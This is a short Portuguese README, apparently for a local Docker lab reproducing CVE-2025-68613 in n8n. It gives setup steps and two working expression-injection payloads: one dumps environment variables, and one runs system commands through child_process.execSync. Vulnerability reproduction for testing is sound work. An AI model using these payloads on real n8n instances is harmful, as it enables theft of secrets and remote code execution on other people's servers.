
Análise do CVE-2025-68613
Este repositório fornece uma configuração simples de Docker Compose que executa uma instância vulnerável do n8n para testes locais de CVE-2025-68613.
Inicie o contêiner:
docker compose up -d
Abra o n8n no seu navegador:
Faça login com as credenciais padrão definidas em docker-compose.yml:
adminpassworddocker compose down
Este ambiente é apenas para testes locais e isolados. Não exponha esta instância à internet pública ou a qualquer rede não confiável. Mantenha-a em um segmento de rede privado, somente local, e separado dos sistemas de produção. Use por sua conta e risco.
Assim que o contêiner estiver em execução, você pode acessar a interface do n8n em http://localhost:5678. Para testar a vulnerabilidade, você injetará uma carga útil JavaScript maliciosa em um campo de expressão. Passos para Reproduzir:
{{ (function() { return this.process.env; })() }}

Teste 2: Execução Remota de Código (RCE) Esta carga útil tenta carregar o módulo child_process para executar comandos do sistema (por exemplo, whoami).
{{ (function() {
var require = this.process.mainModule.require;
var execSync = require('child_process').execSync;
return execSync('whoami').toString();
})() }}

Resultado Esperado: Se o ambiente estiver vulnerável, o painel "Output" do nó Set exibirá o resultado do comando (por exemplo, root ou o usuário do n8n) ou um objeto JSON contendo as variáveis de ambiente. Se a instância estivesse corrigida (por exemplo, versão 1.122.0+), o sandbox retornaria um objeto vazio ou um erro.